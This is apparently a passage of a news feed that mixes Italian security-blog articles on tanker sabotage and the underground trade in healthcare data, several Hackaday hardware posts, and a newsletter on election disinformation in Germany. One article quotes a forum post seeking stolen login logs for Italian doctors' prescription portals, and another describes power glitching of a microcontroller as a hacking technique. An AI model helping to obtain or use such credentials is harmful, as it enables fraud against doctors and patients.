Queste pratiche sono state evidenziate ad esempio nel gennaio 2024 relativamente all’identificazione tramite tecnologia satellitare di 383 vascelli, di cui 189 con bandiera panamense che trafficavano petrolio iraniano, parte di una ‘flotta fantasma’, di cui il Senato US ha richiesto l’immediato controllo all’autorità marittima di Panama.

Sempre riguardo il petrolio irarniano sono emerse informazioni importanti da una serie di oltre 10.000 e-mail da un leak di Sahara Thunder, società di facciata iraniana – che spedisce merci per conto del MODAFL – Ministero della difesa e della logistica delle forze armate – a più giurisdizioni, tra cui la Repubblica Popolare Cinese (RPC), la Russia e il Venezuela – che descrivono il suo commercio di petrolio dal marzo 2022 al febbraio 2024. le reti di evasione delle sanzioni occidentali, la flotta di navi, le operazioni di vendita di petrolio, i processi di rigassificazione, le figure chiave all’interno dell’azienda e il loro commercio di armi con la Russia, nonché porterebbero prove dei legami di Sahara Thunder con le attività del MODAFL. Così la Sahara Thunder ha stipulato contratti di noleggio a tempo con Zen Shipping & Port India Private Limited con sede in India per la nave battente bandiera delle Isole Cook CHEM (IMO 9240914), operata da Safe Seas Ship Management FZE con sede negli Emirati Arabi Uniti che gestisce anche la DANCY DYNAMIC (9158161) con bandiera di Palau, la K M A (9234616) con bandiera delle Isole Cook e la CONRAD (9546722) con bandiera delle Isole Cook, tra le altre.

Allo stesso modo seguendo la stessa logica dei movimenti di petrolio iraniano possiamo farlo per la flotta ombra che trasporta merci per conto della Russia. Analizziamo quindi alcune delle navi che riportano comuni caratteristiche, tra cui proprio la SeaJewel messe in correlazione con i recenti incidenti e manomissioni subiti.

In ultimo analizzando uno dei porti di attracco della SeaJewel c’è un’altra storia che emerge, al porto di Costanta (Romania) sul Mar Nero, per capire che queste pratiche avvengono da anni e sono aumentate dopo lo scoppio del conflitto russo-ucraino.

Nel 2023, viene riportato da context.ro, un imprenditore rumeno, Gheorghe Bosînceanu – che appariva nei Paradise Papers come beneficiario dei servizi di Appleby, un fornitore internazionale di servizi legali offshore e che aveva già avuto una controversa transazione nel 2002 con il governo rumeno riguardo un cantiere navale – controllava una flotta dietro un labirinto di società registrate in giurisdizioni offshore per trasportare petrolio russo. Il suo nome è emerso dietro una società quotata in borsa (Histria Management) a cui appartiene la flotta navale, registrata in un paradiso fiscale e le cui navi petrolifere operavano dal porto di Costannte in Romania, trasportando petrolio russo verso l’Europa e soprattutto verso la Turchia.

La scoperta è avvenuta dopo l’indagine internazionale, “Fueling the war” , che ha rivelato che un’entità rumena era inclusa in una lista di aziende che trasportavano petrolio russo dopo le sanzioni a Mosca. Ma nella lista non compare solo la società rumena, bensi parecchie società dislocate in altri paesi europei. I dati analizzati da Investigate Europe riferibili al 2022 mostrano che la maggior parte delle spedizioni dai porti russi sono state effettuate da navi di proprietà di società di Grecia, Cina ed Emirati Arabi Uniti. “In termini di capacità di carico” evidenzia Context “le società greche Tms Tankers Ltd e Minerva Marine Inc, insieme a Scf Management Services Dubai, sono le prime tre compagnie russe di combustibili fossili dall’inizio della guerra”. Le sanzioni – contro Venezuela, Iran e Russia – hanno reso necessari viaggi medi più lunghi per il petrolio trasportato via mare, nel caso del petrolio russo e della sua flotta ombra, la dimensione preferita è Aframax (vd. Seajewel) e per questo tipo di petroliere i prezzi nel 2022 erano quasi triplicati rispetto agli anni precedenti.

Altre navi sanzionate fanno parte delle black list registrate nel Mar Baltico per la limitazione del traffico petrolifero russo a Dicembre 2022, 167 navi di cui la maggior parte (126) registrate in Grecia, Seychelles, Turchia, Cina, Marshall Islands.

I sabotaggi di Seajewel, Seacharm, Grace Ferrum e Suezmax, guerra commerciale, mine nei mari o “controlli più rigorosi”?

Tra il 17 e il 18 gennaio 2025 la Seacharm (IMO:9773765) subisce un’esplosione mentre naviga al largo del porto turco di Ceyhan, naviga poi verso la Grecia, probabilmente diretta al cantiere dove rimane circa 10 giorni, presso i cantieri navali di Skaramangas, dove è stata sottoposta a riparazioni dal 20 al 30 gennaio, sino a fine gennaio secondo Lloyd Intelligence.

Da lì naviga verso la Libia, dove preleva un carico e risulta poi essere a Savona insieme alla Seajewel (IMO: 9388807) che subisce due esplosioni a scoppio ritardato.Entrambe le navi sono gestite da Themaris: il punto in comune si trova al terminal di Novorossiysk, in Russia. Ma Themaris si trova in buona compagnia: sempre in febbraio ad essere stata presa di mira è stata la petroliera russa Suezmax (IMO: 9234642) nel porto baltico russo di Ust-Luga. La Grace Ferrum (IMO: 9667928) – proprietà elencata da Equasis come tramite Grace Ferrum Shipping in Liberia, con la gestione ISM da Cymare Navigation negli Emirati Arabi Uniti – invece ha subito esplosioni al largo della costa libica sempre all’inizio di febbraio: proveniva dai porti di San Pietroburgo e Ust-Luga. Cosa unisce questi vascelli? TradeWinds nel 2023 aveva riferito che la Grace Ferrum era stata acquisita da Grace Energy, fondata dall’armatore poco conosciuto Stanislav Raspopov – ‘ex analista commerciale e agente marittimo del gruppo Navig8 che aveva fondato la società ad Atene e Dubai per controllare una flotta di petroliere MR rapidamente accumulata. Documenti depositati presso la Companies House del Regno Unito mostrano che Raspopov era un cittadino russo prima di diventare cittadino greco residente a Londra nel 2022. Grace Energy – sempre secondo TradeWinds – rispetta sempre le normative occidentali sulle spedizioni di petrolio, incluso il tetto massimo del prezzo del petrolio russo.

Si tratta di una guerra commerciale o di una conseguenza di un “controllo più rigoroso delle operazioni marittime?”. Entrambe le ipotesi, da quanto abbiamo analizzato sin qui, sembrano possibili, tuttavia vi sono speculazioni che si tratti di operazioni di sabotaggio sostenute dall’Ucraina. La società di intelligence Ambrey Analytics ha affermato che non tutti gli obiettivi sono stati designati nell’ambito di programmi di sanzioni, ma i rischi attualmente sono “valutati come sostanziali”. Questi incidenti sono i primi che coinvolgono navi non militari nella regione da tempo, tempi in cui le navi erano vulnerabili a causa delle “mine piazzate nel Mar Baltico, nel Mare del Nord, nel Mediterraneo e nel Mar Nero”impiegate nella guerra marittima.

Relativamente alla questione è un articolo su MarketScreener che parla di mine a mignatta (di tipo BPM 1 o BPM 2) o mine a patella che vengono “attaccate alle navi con dei magneti e di solito contengono esplosivi TNT (trinitrotoluene) che vengono attivati con un timer, ha detto una delle fonti”.

Approfondendo, sempre secondo Lloyd Intelligence le navi della Thenmaris navigano nella legalità, oltre al fatto che “rimane del tutto legittimo trasportare greggio russo fintanto che rispetta il tetto massimo di prezzo di 60 $ al barile. È anche consentito sollevare greggio prodotto da ex costituenti dell’Unione Sovietica, come il Kazakistan, che spesso vengono ancora gestiti nei terminal russi”. Infatti la Seajewel ha fatto sì scalo in Russia l’anno scorso, ma si sarebbe trattato dl sollevamento della miscela di greggio CPC kazako dal Black Sea Caspian Pipeline Consortium.

Questo è il tipo di operazioni del tutto legali ed etiche intraprese da Thenamaris (aframax) che se anche ‘operando regolarmente’ è stata inserita in un lista di cinque compagnie di navigazione greche nell’elenco degli “sponsor di guerra internazionali” dall’Agenzia nazionale per la prevenzione della corruzione ucraina (NACP), con le accuse di trasportare “petrolio e prodotti petroliferi russi, alimentando così il bilancio dello Stato terrorista e finanziando l’aggressione russa”.

Nella lista si trovanola Minerva Marine, la Thenamaris, la TMS Tankers a cui si aggiunge la Dynacom Tankers Management Ltd.

Il 30% delle petroliere – sottolinea Klymenko – che servono alle esigenze del complesso militare-industriale russo batte bandiera greca ogni mese.

La grande vendita di navi greche allo scoppio del conflitto russo-ucraino

TradeWinds ha inoltre rilevato che con lo scoppio della guerra ucraina e l’aumento delle tariffe del trasporto che c’è stata una “grande vendita di navi greche” ma anche aziende statunitensi e norvegesi ne hanno beneficiato, ma le navi greche, secondo l’economista capo dell’Institute of International Finance, Robin Brooks, rappresentano attualmente quasi il 50 percento della capacità delle petroliere in uscita dai porti russi, rispetto al 33 percento prima della guerra russo-ucraina ma bisogna ripeterlo: “rimane del tutto legittimo trasportare greggio russo fintanto che rispetta il tetto massimo di prezzo di 60 $ al barile”. Il boom di vendite – di vecchie petroliere – si rileva nel febbraio del 2022, data dalla quale sono state vendute circa 125 petroliere di armatori greci per un valore di 4 miliardi di dollari, vendite che sono proseguite poi nel 2023. Particolarmente cercate sono le petroliere Suezmax e Aframax: il terzo e il quarto tipo più grande di petroliere per il greggio e con dimensioni perfette per lo spostamento di carichi russi. La stessa Thenamaris ha venduto la petroliera Aframax Seatrust (IMO:9979993) – cifra stimata di 35 milioni di dollari – ma come succede per tutte queste navi, il nome del nuovo proprietario rimane oscurato. Tuttavia tra gli acquirenti secondo ForeignPolicy troviamo Emirati Arabi Uniti, Cina, Turchia (tra cui la BEKS Ship Management & Trading) e India.

Così gli armatori greci in una frenesia di vendite si sono sbarazzati delle vecchie navi potendo cosi rinnovare la loro flotta, spesso con navi più piccole.

Thenamaris è recentemente emerso come il nuovo proprietario della petroliera da 108.500 dwt Southern Rouse (rinominata Sealoyalty (IMO:9783928), costruita nel 2018), un’ex nave di proprietà di Nissen Kaiun che, secondo quanto riferito, ha cambiato proprietario nel dicembre 2022.

Fonte immagine: app.maritimeoptima.com/, Sealoyalty, ultima rotta.

Cui prodest

E quando quel mondo finiva con le colonne d’Ercole ad ovest e con i giardini di Babilonia ad est, i nomi di antichi navigatori come Annone, Himilco, Nearco, Arriano, Plinio, e delle loro vicende, erano già leggenda. _ Antichi navigatori verso le Indie e le antiche colonne d’Ercole.

Alla domanda di chi trarrebbe vantaggio dei sabotaggi avvenuti in questi mesi a diverse petroliere, vi sono diverse risposte molte delle quali ancora speculative, senza prove verificate. Le motivazioni possono essere geopolitiche, economiche o strategiche e vanno da stati che trarrebbero vantaggio da un’interruzione delle vie energetiche del Mediterraneo o delle esportazioni di petrolio rivali sino ad organizzazioni criminali che operano nel mercato nero. Secondariamente i progetti di gas del Mediterraneo orientale – che abbiamo visto prima – potrebbero trarre vantaggio dagli incidenti per accelerare le importazioni di gas o i progetti delle pipeline in corso. In modo molto minore invece gli incidenti avrebbero come obiettivo l’aumento dei premi per l’assicurazione marittima e della domanda di scorte navali private, anche se i traders traggono sempre vantaggio dal panico per trarre i loro profitti.

Abbamo constatato che le esportazioni in oggetto risultano quantomeno “legali” ma il loro sabotaggio potrebbe sia avere l’obiettivo di monopolizzarne il commercio di un poteziale mercato nero, sia essere la conseguenza di operazioni volte a fermare il commercio di pertrolio russo da parte di compagnie greche. Infine più vicino alla narrazione cinematografica ma senza Brad Pitt (L’esercito delle 12 scimmie) sono gli attivisti ma è molto improbabile che causino esplosioni e comunque i fenomeni di ecoterrorismo sono in lento e costante declino in tutto il mondo.

La Grecia come abbiamo visto rimane un attore importante nel transito di risorse energetiche nel Mediterrano, sabotare le sue navi destabilizza in qualche modo il mercato, facendo pressione sull’Europa, nelle controversie sui confini marittimi e sui diritti sugli idrocarburi e le tensioni con la Turchia su Cipro e Creta. Al largo della Libia invece le riserve di petrolio e gas offshore sono contese da fazioni rivali (ad esempio, il Governo di accordo nazionale sostenuto dalla Turchia contro l’Esercito nazionale libico sostenuto da Russia/Egitto/EAU). I sottomarini in questa zona – es. Krasnodar – che monitorano le acque libiche possono raccogliere informazioni, proteggere le infrastrutture energetiche o consentire operazioni segrete per controllare le risorse ma anche monitorare le spedizioni di armi alle fazioni (violando gli embarghi delle Nazioni Unite) o ancora dispiegare droni o sommozzatori sottomarini per manomettere cavi o petroliere.

Infine tutti questi incidenti che ho elencato lungo l’articolo, provocano il caos e riflettono un moderno campo di battaglia in cui convergono energia, dati e potenza navale. Il Mediterraneo è diventato un teatro per un conflitto ibrido, non dimenticando che anche la Libia è al centro.

Bibliografia

• atlanticcouncil.org/blogs/turk…
• crisisgroup.org/europe-central…
• depa-int.gr/en/interconnector-…
• greenpeace.org/italy/storia/17…
• grassley.senate.gov/imo/media/…
• ​​reuters.com/graphics/IRAN-OIL/…
• home.treasury.gov/news/press-r… (Treasury Targets Networks Facilitating Illicit Trade and UAV Transfers on Behalf of Iranian Military, Aprile 2025)
• greenpeace.org/italy/storia/17…
• lawfaremedia.org/article/whats…
• context.ro/a-romanian-milliona…
• investigate-europe.eu/en/posts…
• feem.it/ricerca/progetti/the-f…
• iiss.org/publications/strategi…
• irpimedia.irpi.eu/adriaticocri…
• nauticareport.it/dettnews/stor…
• itamilradar.com/2025/02/15/mon…
• crsreports.congress.gov/produc…
• foreignpolicy.com/2023/09/11/g…
• perma.cc/YXS8-ACXT
• maritime-executive.com/article…
• documenti.camera.it/_dati/leg1… news.usni.org/2025/01/22/u-k-s…
• blackseanews.net/en/read/22801…
• it.marketscreener.com/notizie/…

L'articolo Il gioco del gatto e del topo tra sabotaggi di petroliere e cavi sottomarini proviene da il blog della sicurezza informatica.

For the maker looking to turn their project into a business, trying to price your widget can be a bit of a conundrum. You want to share your widget with the world without going broke in the process. What if you could achieve both, letting the end user finish assembly?

[PDF]While over a decade has passed since Harvard Business School released this study on what they dub “The IKEA Effect,” we suspect that most of it will still be relevant given the slow pace of human behavior change. In short, when you make someone become part of the process of manufacturing or assembling their stuff, it makes them value it more highly than if it was already all put together in the box.

Interestingly, the researchers found “that consumers believe that their self-made products rival those of experts,” and that this is true regardless of whether these people consider themselves to be DIY enthusiasts or not. This only holds if the person is successful though, so it’s critical to have good instructions. If you have a mass market item in the works, you probably don’t want to require someone with no experience to solder something, but as IKEA has shown, nearly anybody can handle some hex screws and Allen wrenches.

If you’re looking for more advice on how to get your invention in people’s hands, how about this Supercon talk by Carrie Sundra about manufacturing on a shoestring budget or this video from Simone Giertz on her experiences with manufacturing from idea to finished product. You might want to steer clear of people promising patents for pennies on commercials, though.

hackaday.com/2025/03/02/some-a…

Spesso parliamo di “dati sanitari” e dell’interesse dei criminali informatici a queste preziose informazioni, sulle quali abbiamo scritto anche specifici articoli sul tema. Un recente annuncio pubblicato su un forum underground in lingua russa mette in luce una delle pratiche più diffuse e pericolose: la richiesta di database o log contenenti informazioni sui medici italiani.

Questo tipo di dati, se finisse nelle mani sbagliate, potrebbe essere utilizzato per una vasta gamma di attività criminali, tra cui frodi, ricatti e accessi non autorizzati ai sistemi sanitari.
Ciao a tutti, ho urgente bisogno di qualcuno che mi possa procurare i registri dei medici italiani per il portale medico2000/medicoTS/ricettaTS. pagherò cifre elevate per singoli tronchi, fintanto che funzioneranno.

E' necessario utilizzare il deposito a garanzia, ovviamente.

se hai qualcosa di simile o altre domande su ciò di cui ho bisogno in modo specifico puoi mandarmi un messaggio privato o contattarmi @T*******

grazie *****

Come funziona il mercato nero delle informazioni?

I forum underground e i marketplace del dark web fungono da punto di incontro tra domanda e offerta di dati sensibili. Qui, hacker, truffatori e cybercriminali possono acquistare informazioni preziose come credenziali di accesso, dati sanitari, numeri di carte di credito e molto altro. I prezzi variano in base alla qualità e alla rarità delle informazioni: più un dato è esclusivo e aggiornato, maggiore sarà il suo valore.

A cosa servono questi dati?

Le informazioni sottratte possono essere sfruttate in vari modi:

• Frodi sanitarie: Accesso ai portali medici per prescrivere farmaci illeciti, ottenere rimborsi o falsificare diagnosi.
• Attacchi mirati: Utilizzo delle credenziali per accedere a reti ospedaliere e diffondere ransomware.
• Furto di identità: Creazione di identità fittizie per ottenere prestiti o altre forme di credito.
• Ricatti e doxxing: Minaccia di divulgare informazioni private in cambio di un pagamento.

La minaccia della rivendita dei dati

Uno degli aspetti più preoccupanti di questo traffico illecito è la possibilità che i dati rubati vengano rivenduti più volte. Un hacker potrebbe vendere lo stesso set di credenziali a più acquirenti, moltiplicando il rischio per le vittime. Inoltre, le informazioni raccolte vengono spesso utilizzate per compiere attacchi più sofisticati, come spear phishing o campagne di ingegneria sociale, mettendo a rischio non solo i singoli individui ma anche intere istituzioni.

Come proteggersi?

Per contrastare il fenomeno del cybercrime e la vendita di dati sensibili, è essenziale adottare misure di sicurezza adeguate:

• Utilizzare autenticazione a più fattori (MFA) per proteggere gli account.
• Monitorare le attività sospette sui propri account e segnalare eventuali anomalie.
• Evitare di riutilizzare le stesse credenziali su più servizi.
• Diffondere consapevolezza tra i professionisti del settore sanitario sull’importanza della cybersecurity.

La richiesta di database di medici italiani evidenzia ancora una volta quanto sia elevata la domanda di dati sensibili nei mercati underground. Proteggere le proprie informazioni e quelle dei pazienti non è mai stato così cruciale. La cybersecurity non è solo una questione tecnica, ma una responsabilità collettiva.

L'articolo Italia e Ospedali nel mirino degli hacker: il business segreto dei dati sanitari rubati proviene da il blog della sicurezza informatica.

In a move that could have been seen coming from at least a decade away, Microsoft has confirmed that the Skype service will be shutting down on May 5. This comes after an intrepid person stumbled over a curious string in the latest Skype for Windows preview. This string seemed intended to notify the user about the impending shutdown, telling them to migrate to Teams instead.

Skype was originally created in 2003 by a group of European developers, where it saw some success, with the service being acquired by Microsoft in 2011. Much like other messaging services, each Skype user has a unique ID, but there is also integration with phone services around the world. When Microsoft overhauled the user interface in 2017, this caused a split between ‘classic’ UI fans and the heretics who liked the new interface.

With Microsoft not really finding a way to stop the bleeding of users by this time, and with its nascent Teams service enjoying success despite any complaints anyone might have about it, it seems that now the time has come where Skype will be put out to pasture. For the handful of Skype users still left today, the options are to either download your data before it’s erased, or to move your user account to Teams.

hackaday.com/2025/03/02/skype-…

In today’s “futuristic tech you can get for $5”, [RealCorebb] shows us a gesture sensor, one of the sci-fi kind. He was doing a desktop clock build, and wanted to add gesture control to it – without any holes that a typical optical sensor needs. After some searching, he’s found Microchip’s MGC3130, a gesture sensing chip that works with “E-fields”, more precise than the usual ones, almost as cheap, and with a lovely twist.

The coolest part about this chip is that it needs no case openings. The 3130 can work even behind obstructions like a 3D-printed case. You do need a PCB the size of a laptop touchpad, however — unlike the optical sensors easy to find from the usual online marketplaces. Still, if you have a spot, this is a perfect gesture-sensing solution. [RealCorebb] shows it off to us in the demo video.

This PCB design is available as gerbers+bom+schematic PDF. You can still order one from the files in the repo. Also, you need to use Microchip’s tools to program your preferred gestures into the chip. Still, it pays off, thanks to the chip’s reasonably low price and on-chip gesture processing. And, [RealCorebb] provides all the explanations you could need, has Arduino examples for us, links all the software, and even provides some Python scripts! Touch-sensitive technology has been getting more and more steam in hacker circles – for instance, check out this open-source 3D-printed trackpad.

youtube.com/embed/Or8UPq3nDdc?…

hackaday.com/2025/03/01/this-g…

Typically, if you’re shooting 35 mm film, you’re using it in an old point-and-shoot or maybe a nice SLR. You might even make some sizeable prints if you take a particularly good shot. But you can get altogether weirder with 35 mm if you like, as [Socialmocracy] demonstrates with his “extreme sprocket hole photography” project (via Petapixel).

The concept is simple enough. [Socialmocracy] wanted to expose four entire rolls of 35 mm film all at the same time in one single shot. To be absolutely clear, we’re not talking about exposing a frame on each of four rolls at once. We’re talking about a single exposure covering the entire length of all four films, stacked one on top of the other.

To achieve this, an old-school Cirkut No.6 Outfit camera was pressed into service. It’s a large format camera, originally intended for shooting panoramas. As the camera rotated around under the drive of a clockwork motor, it would spool out more film to capture an image.

[Socialmocracy] outfitted the 100-year-old camera with a custom 3D-printed spool that could handle four rolls of film at once, rather than its usual wide single sheet of large format film. This let the camera shoot its characteristic panoramas, albeit spread out over multiple rolls of film, covering the sprocket holes and all. Hence the name—”extreme sprocket hole photography.”

It’s a neat build, and one that lets [Socialmocracy] use more readily available film to shoot fun panoramas with this old rig. We’ve featured some other great film camera hacks over the years, too, like this self-pack Polaroid-style film. Video after the break.

youtube.com/embed/0RYM8ldqwiU?…

[Thanks to naMretupmoC for the tip!]

hackaday.com/2025/03/01/using-…

Own a Bus Pirate 5? Now, it can do power glitching, thanks to [Matt Brugman’s] demo and contributions to the stock code. This is also a great demo of Bus Pirate’s capabilities and programmability! All you need is the Bus Pirate and a generic Arduino – load a glitch-vulnerable code example into the Arduino, get yourself a generic FET-based glitching setup, and you too can play.

The Arduino board outputs data over UART, and that’s used as a trigger for the Bus Pirate’s new glitch feature – now mainline, thanks to [Matt]’s pull request. It’s pretty feature-complete, too — all parameters are configurable, it can vary the glitching interval, as one would want, and the code checks for success conditions so that it can retry glitching automatically.

In this demo, it only took six consecutive attempts to successfully glitch the ATMega328P – wouldn’t you know it, the code that got glitched was pulled almost wholesale from an IoT device. Glitching remains an underappreciated vector for reverse-engineering, and there’s really no shortage of hacks it allows you to do – get yourself a FET, a Bus Pirate, or maybe just an ESP8266, and join the glitching-aware hackers club!

Want to know more about the Bus Pirate 5? Check out our hands-on review of the hacker multi-tool from last year.

hackaday.com/2025/03/01/the-bu…

The early 2000s were the halcyon days of physical media. While not as svelte as MP3 players became, why are those early 2000s machines smaller than all the new models popping up amidst the retro audio craze?

We’ve bemoaned the end of the electromechanical era before, and the Verge recently interviewed the people at We Are Rewind and Filo to get the skinny on just why these newer cassette and CD players aren’t as small as their predecessors. It turns out that all currently produced cassette players use the same mechanism with some small tweaks in materials (like metal flywheels in these higher quality models) because the engineering required to design a smaller and better sounding alternative isn’t warranted by the niche nature of the cassette resurgence.

A similar fate has befallen the laser head of CD mechanisms, which is why we don’t have those smooth, rounded players anymore. Economies of scale in the early 2000s mean that even a cheap player from that era can outperform a lot of the newer ones, although you won’t have newer features like Bluetooth to scandalize your audiophile friends. A new Minidisc player is certainly out of the question, although production of discs only ended this February.

If you’re looking to get back into cassettes, this masterclass is a good place to start. If you don’t fancy any of the players the Verge looked at, how about rolling your own incarnation with the guts from a vintage machine or just going for the aesthetic if cassettes aren’t your jam?

youtube.com/embed/2DWtkSVNvTg?…

hackaday.com/2025/03/01/why-ar…

[Chris] had an idea. When playing VR games like BeatSaber, he realized that spectators without headsets weren’t very included in the action. He wanted to create some environmental lighting that would make everyone feel more a part of the action. He’s taken the first steps towards that goal, interfacing SteamVR controllers with addressable LEDs.

Armed with Python, OpenVR, and some help from ChatGPT, [Chris] got to work. He was soon able to create a mapping utility that let him create a virtual representation of where his WLED-controlled LED strips were installed in the real world. Once everything was mapped out, he was able to set things up so that pointing the controller to a given location would light the corresponding LED strips. Wave at the windows, the strips on that wall light up. Wave towards the other wall, the same thing happens.

Right now, the project is just a proof of concept. [Chris] has enabled basic interactivity with the controllers and lights, he just hasn’t fully built it out or gamified it yet. The big question is obvious, though—can you use this setup while actually playing a game?

“I just found the OpenVR function/object that allows it to act as an overlay, meaning it can function while other games are working,” [Chris] told me. “My longer term goals would be trying to interface more with a game directly such as BeatSaber, and the light in the room would correspond with the game environment.”

We can’t wait to see where this goes next. We fully expect flashy LED room setups to become the norm at VR cafes hosting BeatSaber competitions in future. We’ve featured plenty of other coverage of VR lately, too.

youtube.com/embed/jRTiu2mgVi0?…

hackaday.com/2025/03/01/steamv…

This week, I had to do something I haven’t done in a long, long time: make myself a custom PCB the old-fashioned way, with laser toner and etchant. The reason? I bought a horrible K40 laser cutter, and the motion controller doesn’t seem to be able to do acceleration control, which means the machine rams full speed into and out of 90 degree corners, for instance. It sounds awful, and it dramatically limits how fast the laser cutter can run.

The plan, then, is to use a controller based on the wonderful FluidNC, but that meant making an adapter board for the flat-flex cable that connects to the X carriage, and the connector has 2 mm pin spacings instead of the usual 2.54 mm, and it just doesn’t fit into any prototyping boards that I have lying around. Besides, a custom PCB adapter board just looks neater.

I wasn’t confident that I could align and drill the dozen small holes for the flat-flex connector; they didn’t have much extra space around them for the copper pads. These holes had to be dead on, or risk ripping them up. And this is where I heard the voice of my old Jedi master.

When you have a tricky operation coming up that requires more precision than you’re immediately comfortable with, you can practice on the other parts of the project that don’t demand that much precision. Pretending that they do, and taking all the care that you can, gets you in shape to tackle the truly critical bits, and if you mess up a little on the easy stuff, it’s not a problem. I had more than a few pin-headers and other random holes to drill for practice anyway.

Now of course, you could always be giving all of your projects 100% all of the time, if time is never of the essence and effort is free. In the real world, you don’t always want to work at maximum precision. Good enough is often good enough.

But there’s also a time and a place for practicing precision, especially when you see a need for it up ahead. Drilling the big holes dead center got me back in the swing of things, and they needed to get drilled one way or the other. I find it useful to think about the job first, plan ahead where the tricky bits are going to be, and then treat the “easy” stuff along the way as practice for the more demanding operations. Hope you do too!

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!

hackaday.com/2025/03/01/practi…

Money, status, or even survival – there’s no shortage of incentives for faking results in the scientific community. What can we do to prevent it, or at least make it noticeable? One possible solution is cryptographic signing of measurement results.

Here’s a proof-of-concept from [Clement Heyd] and [Arbion Halili]. They took a ThermoFisher Scientific 7500 Fast PCR (Polymerase Chain Reaction) machine, isolated its daughter-software, and confined it into a pipeline that automatically signs each result with help of a HSM (Hardware Security Module).

A many machines do, this one has to be paired to a PC, running bespoke software. This one’s running Windows XP, at least! The software got shoved into a heavily isolated virtual machine running XP, protected by TEE (Trusted Execution Environment). The software’s output is now piped into a data diode virtual serial port out of the VM, immediately signed with the HSM, and signed data is accessible through a read-only interface. Want to verify the results’ authenticity? Check them against the system’s public key, and you’re golden – in theory.

This design is just a part of the puzzle, given a typical chain of custody for samples in medical research, but it’s a solid start – and it happens to help make the Windows XP setup more resilient, too.

Wondering what PCR testing is good for? Tons of things all over the medical field, for instance, we’ve talked about PCR in a fair bit of detail in this article about COVID-19 testing. We’ve also covered a number of hacker-built PCR and PCR-enabling machines, from deceivingly simple to reasonably complex!

hackaday.com/2025/03/01/making…

Good morning! There's a bonus edition of Digital Politics this week. I'm Mark Scott, and I've spent the last six days assessing what to make of the recent German federal election on Feb 23.

Despite fears of record levels of foreign interference, the outcome was what almost everyone predicated. Already, some are claiming victory in the fight against online disinformation aimed at undermining the country's democratic institutions.

That would be a mistake. Below is a cross-post from my analysis for Tech Policy Press.

Let's get started:

Lessons from Germany's federal election

A week has passed since Germany’s federal election, and many are breathing a sigh of relief.

Friedrich Merz, a 69-year-old center-right politician, will almost certainly become the country’s next Chancellor, though a ruling coalition government — between Merz’s Christian Democrat Union (CDU) and the center-left Social Democratic Party (SDP) — won’t be formed until mid-April, at the earliest.

Alternative for Deutschland (AfD), a far-right party that garnered support from the likes of US Vice President JD Vance and Elon Musk, finished second in the election with just under 21 percent of the national vote. That party had found vocal support with younger, male voters, particularly in the Eastern parts of Germany, and had garnered significant traction across social media — particularly on Musk’s X, formerly known as Twitter.

Yet widespread fears around online election interference, either promoted by foreign countries like Russia or amplified by fringe domestic groups spreading conspiracy theories around alleged voter fraud or Germany’s supposed misguided support for Ukraine, did not materialize.

The result of Germany’s Feb 23 election was as many had predicted. The country’s vote now joins a growing list of national elections — including scores during 2024 in which more than two billion people voted globally — where close scrutiny from regulators, national security officials and outside researchers has discovered that foreign actors’ both overt and clandestine efforts to sway voters’ decisions proved less successful than first imagined.

Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com

Yet the relief now felt in Germany — that the country’s democratic institutions withstood what national officials and outsiders claimed were unprecedented levels of election-related foreign interference — is misplaced.

It fundamentally misunderstands that digital attacks on countries’ electoral processes can not be combatted solely during short election campaign cycles during which heightened attention is aimed at such malign actors. Instead, foreign adversaries and domestic groups that often amplify state-backed online propaganda are in this for the long haul — and their activities should be viewed over years, if not decades.

Why no one should claim 'mission accomplished'

Any claims — in Germany or other democratic countries — that national officials, tech companies and civil society groups were able to thwart digital interference attacks ahead of individual elections represent a false economy. For one, it’s almost impossible to link specific examples of online state-backed propaganda and covert influence campaigns to how voters cast ballots. For another, those online attacks don’t just stop because a country’s election cycle has come to an end.

Even as Merz’s CDU political party began haggling with the center-left SPD over a new coalition government, Russia’s state-backed media continued to sow dissent and division within Germany for its own political gain.

RT Deutschland — a Kremlin-back media organization that, while banned within the European Union, is still widely accessible in Germany — pumped out article after article about how the Feb 23 election was unjust; that the failure to include AfD in the coalition government was anti-democratic; and that Germany’s ongoing support for Ukraine represented unjustified war-mongering.

If promoted by domestic actors, such talking points would be legal under the country’s free speech rules. But they were instead amplified by a foreign state adversary whose Kremlin-backed media outlets have been sanctioned because of “disinformation and information manipulation against the EU and its member states.”

Under long-standing political norms dating back to the aftermath of World War Two, Germany’s mainstream political parties have created a so-called “firewall” in which politicians will not allow groups associated with extremist movements, including the AfD, to join coalition governments.

Vance, the US Vice President, recently criticized such practices in a speech in Munich. “Democracy rests on the sacred principle that the voice of the people matters,” he said. “There’s no room for firewalls.”

It’s not just foreign adversaries that have continued to cast doubt on Germany’s election — even after the outcome was a foregone conclusion.

Across multiple Telegram channels, some of which have hundreds of thousands of followers, domestic influencers have spread false claims about rigged ballots; accusations that Germany should not support Ukraine because of its alleged starting of the war with Russia; and allegations the CDU wants to outlaw the AfD. Those messages have been further amplified, primarily on X, where some have garnered attention from non-German social media users and have been picked up by Russia’s state media.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Again, none of these falsehoods are illegal under German law, and can not be removed by platforms under the EU’s Digital Services Act. But this slow dripping of inaccurate information — often within fringe social media communities where fact-checking does not exist — represents an ongoing threat to national democratic institutions, particularly when those domestic messages are further amplified by foreign adversaries.

Ahead of Germany’s Feb 23 election, the country’s officials held a so-called ‘stress test’ with the likes of Meta, TikTok, and X to war-game potential threats to the national vote. Klaus Müller, head of the national regulator in charge of the exercise, said his agency was “well prepared” to combat election-related problems. The European Commission also published advice for how national regulators should protect national elections.

Such efforts should not be prioritized for when countries hold elections.

In the ongoing whack-a-mole fight between national officials seeking to defend countries’ democratic institutions and foreign adversaries eager to undermine those norms via covert influence campaigns and outright online propaganda, it’s now a 24/7, 365-day battle — one that doesn’t just come to an end when the votes have all been counted.

digitalpolitics.co/newsletter0…

Nerf blasters typically fire small foam darts or little foam balls. [Michael Pick] wanted to build something altogether more devastating. To that end, he created a rocket launcher with an advanced air burst capability, intended to take out enemies behind cover.

